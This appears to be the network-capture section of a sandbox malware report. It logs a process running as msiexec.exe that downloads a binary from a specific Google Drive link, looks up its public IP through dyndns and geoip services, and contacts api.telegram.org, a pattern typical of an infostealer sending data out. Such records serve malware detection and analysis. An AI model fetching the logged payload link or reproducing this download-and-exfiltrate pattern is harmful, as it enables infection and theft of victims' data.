Jan 10, 2025 17:09:22.748373032 CET	49994	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:22.751794100 CET	80	49992	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:22.751903057 CET	49992	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:22.753568888 CET	80	49994	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:22.753696918 CET	49994	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:22.753762007 CET	49994	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:22.759129047 CET	80	49994	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:24.728072882 CET	80	49994	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:24.730231047 CET	49995	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:24.730271101 CET	443	49995	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:24.730355978 CET	49995	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:24.730631113 CET	49995	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:24.730643988 CET	443	49995	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:24.783647060 CET	49994	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:25.221252918 CET	443	49995	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:25.223268032 CET	49995	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:25.223289013 CET	443	49995	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:25.375710964 CET	443	49995	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:25.375799894 CET	443	49995	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:25.375847101 CET	49995	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:25.376312971 CET	49995	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:25.380705118 CET	49994	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:25.381931067 CET	49996	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:25.385749102 CET	80	49994	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:25.385804892 CET	49994	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:25.386765957 CET	80	49996	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:25.386851072 CET	49996	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:25.386934042 CET	49996	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:25.391691923 CET	80	49996	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:26.979806900 CET	80	49996	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:26.981242895 CET	49997	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:26.981276989 CET	443	49997	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:26.981359959 CET	49997	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:26.981631041 CET	49997	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:26.981646061 CET	443	49997	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:27.037533045 CET	49996	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:27.466599941 CET	443	49997	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:27.468471050 CET	49997	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:27.468494892 CET	443	49997	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:27.623306990 CET	443	49997	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:27.623405933 CET	443	49997	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:27.623508930 CET	49997	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:27.624038935 CET	49997	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:27.627280951 CET	49996	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:27.628621101 CET	49998	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:27.633085966 CET	80	49996	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:27.633186102 CET	49996	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:27.633384943 CET	80	49998	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:27.633490086 CET	49998	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:27.633630037 CET	49998	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:27.638365030 CET	80	49998	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:28.215542078 CET	80	49998	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:28.217119932 CET	49999	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:28.217144012 CET	443	49999	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:28.217214108 CET	49999	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:28.217487097 CET	49999	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:28.217495918 CET	443	49999	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:28.268085003 CET	49998	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:28.692925930 CET	443	49999	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:28.696043968 CET	49999	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:28.696079016 CET	443	49999	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:28.856260061 CET	443	49999	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:28.856338024 CET	443	49999	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:28.856395960 CET	49999	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:28.857491970 CET	49999	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:28.886244059 CET	49998	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:28.891294003 CET	80	49998	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:28.891369104 CET	49998	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:28.894166946 CET	50000	443	192.168.2.11	149.154.167.220
Jan 10, 2025 17:09:28.894211054 CET	443	50000	149.154.167.220	192.168.2.11
Jan 10, 2025 17:09:28.894278049 CET	50000	443	192.168.2.11	149.154.167.220
Jan 10, 2025 17:09:28.894742966 CET	50000	443	192.168.2.11	149.154.167.220
Jan 10, 2025 17:09:28.894762993 CET	443	50000	149.154.167.220	192.168.2.11
Jan 10, 2025 17:09:29.532850981 CET	443	50000	149.154.167.220	192.168.2.11
Jan 10, 2025 17:09:29.532944918 CET	50000	443	192.168.2.11	149.154.167.220
Jan 10, 2025 17:09:29.534951925 CET	50000	443	192.168.2.11	149.154.167.220
Jan 10, 2025 17:09:29.534960032 CET	443	50000	149.154.167.220	192.168.2.11
Jan 10, 2025 17:09:29.535367012 CET	443	50000	149.154.167.220	192.168.2.11
Jan 10, 2025 17:09:29.537040949 CET	50000	443	192.168.2.11	149.154.167.220
Jan 10, 2025 17:09:29.583326101 CET	443	50000	149.154.167.220	192.168.2.11
Jan 10, 2025 17:09:29.775160074 CET	443	50000	149.154.167.220	192.168.2.11
Jan 10, 2025 17:09:29.775243044 CET	443	50000	149.154.167.220	192.168.2.11
Jan 10, 2025 17:09:29.775346041 CET	50000	443	192.168.2.11	149.154.167.220
Jan 10, 2025 17:09:29.781028032 CET	50000	443	192.168.2.11	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 17:09:08.380151987 CET	61557	53	192.168.2.11	1.1.1.1
Jan 10, 2025 17:09:08.387553930 CET	53	61557	1.1.1.1	192.168.2.11
Jan 10, 2025 17:09:09.549990892 CET	59308	53	192.168.2.11	1.1.1.1
Jan 10, 2025 17:09:09.557679892 CET	53	59308	1.1.1.1	192.168.2.11
Jan 10, 2025 17:09:14.028420925 CET	50547	53	192.168.2.11	1.1.1.1
Jan 10, 2025 17:09:14.036405087 CET	53	50547	1.1.1.1	192.168.2.11
Jan 10, 2025 17:09:15.372720003 CET	63101	53	192.168.2.11	1.1.1.1
Jan 10, 2025 17:09:15.380381107 CET	53	63101	1.1.1.1	192.168.2.11
Jan 10, 2025 17:09:28.886966944 CET	62201	53	192.168.2.11	1.1.1.1
Jan 10, 2025 17:09:28.893620968 CET	53	62201	1.1.1.1	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 17:09:08.380151987 CET	192.168.2.11	1.1.1.1	0xf351	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:09:09.549990892 CET	192.168.2.11	1.1.1.1	0xc364	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:09:14.028420925 CET	192.168.2.11	1.1.1.1	0xee1c	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:09:15.372720003 CET	192.168.2.11	1.1.1.1	0x3a24	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:09:28.886966944 CET	192.168.2.11	1.1.1.1	0xe205	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 17:09:08.387553930 CET	1.1.1.1	192.168.2.11	0xf351	No error (0)	drive.google.com		142.250.186.78	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:09:09.557679892 CET	1.1.1.1	192.168.2.11	0xc364	No error (0)	drive.usercontent.google.com		142.250.186.33	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:09:14.036405087 CET	1.1.1.1	192.168.2.11	0xee1c	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 17:09:14.036405087 CET	1.1.1.1	192.168.2.11	0xee1c	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:09:14.036405087 CET	1.1.1.1	192.168.2.11	0xee1c	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:09:14.036405087 CET	1.1.1.1	192.168.2.11	0xee1c	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:09:14.036405087 CET	1.1.1.1	192.168.2.11	0xee1c	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:09:14.036405087 CET	1.1.1.1	192.168.2.11	0xee1c	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:09:15.380381107 CET	1.1.1.1	192.168.2.11	0x3a24	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:09:15.380381107 CET	1.1.1.1	192.168.2.11	0x3a24	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:09:15.380381107 CET	1.1.1.1	192.168.2.11	0x3a24	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:09:15.380381107 CET	1.1.1.1	192.168.2.11	0x3a24	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:09:15.380381107 CET	1.1.1.1	192.168.2.11	0x3a24	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:09:15.380381107 CET	1.1.1.1	192.168.2.11	0x3a24	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:09:15.380381107 CET	1.1.1.1	192.168.2.11	0x3a24	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:09:28.893620968 CET	1.1.1.1	192.168.2.11	0xe205	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49983	158.101.44.242	80	1480	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 17:09:14.048603058 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 17:09:14.633600950 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:09:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3aa830a6b52afa1a38e164610f0f80d8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 17:09:14.639636993 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 17:09:14.802612066 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:09:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9fc6da089ba716ef6fc9daae6c03afc3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 17:09:16.083961964 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 17:09:16.246877909 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:09:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2cbc2bbaf18a939096f026e85a831c2e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49986	158.101.44.242	80	1480	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 17:09:16.973779917 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 17:09:17.539443970 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:09:17 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 99ff5bb9292bfa9d3f84966fb018969b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.11	49988	158.101.44.242	80	1480	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 17:09:18.180881977 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 17:09:18.782689095 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:09:18 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 034266b8d5ffb8dff68c2d9d55c5cebc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.11	49990	158.101.44.242	80	1480	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 17:09:19.424822092 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 17:09:20.918354988 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:09:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 019019424e1e87245554cff8cbc0b6d3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.11	49992	158.101.44.242	80	1480	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 17:09:21.558166981 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 17:09:22.147300959 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:09:22 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 52bc4fef936095e06c956166feb493f4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.11	49994	158.101.44.242	80	1480	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 17:09:22.753762007 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 17:09:24.728072882 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:09:24 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b69d30ef71f30819f4a2624e95772ac6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.11	49996	158.101.44.242	80	1480	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 17:09:25.386934042 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 17:09:26.979806900 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:09:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 176947c8dcc9fb5a10b98c77913cf9e5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.11	49998	158.101.44.242	80	1480	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 17:09:27.633630037 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 17:09:28.215542078 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:09:28 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b88fb116549aeaebccc08c52b69e5ae6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49981	142.250.186.78	443	1480	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:09:09 UTC	216	OUT	GET /uc?export=download&id=106pvcp-FFRq3kk2pQXd-hO-8ZfrGUfIC HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2025-01-10 16:09:09 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 16:09:09 GMT Location: https://drive.usercontent.google.com/download?id=106pvcp-FFRq3kk2pQXd-hO-8ZfrGUfIC&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-6yD_f3XN8Wxe01TbppIAng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49982	142.250.186.33	443	1480	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:09:10 UTC	258	OUT	GET /download?id=106pvcp-FFRq3kk2pQXd-hO-8ZfrGUfIC&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-01-10 16:09:12 UTC	4936	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFiumC7XaE6UUsZ1TSPBOy2vvVCXpWuIYCx7MD3v-qmTBcpMjdK-ArMrHFqMseRtMQW5MkXd-fqVTRw Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="xpbrtZ60.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, 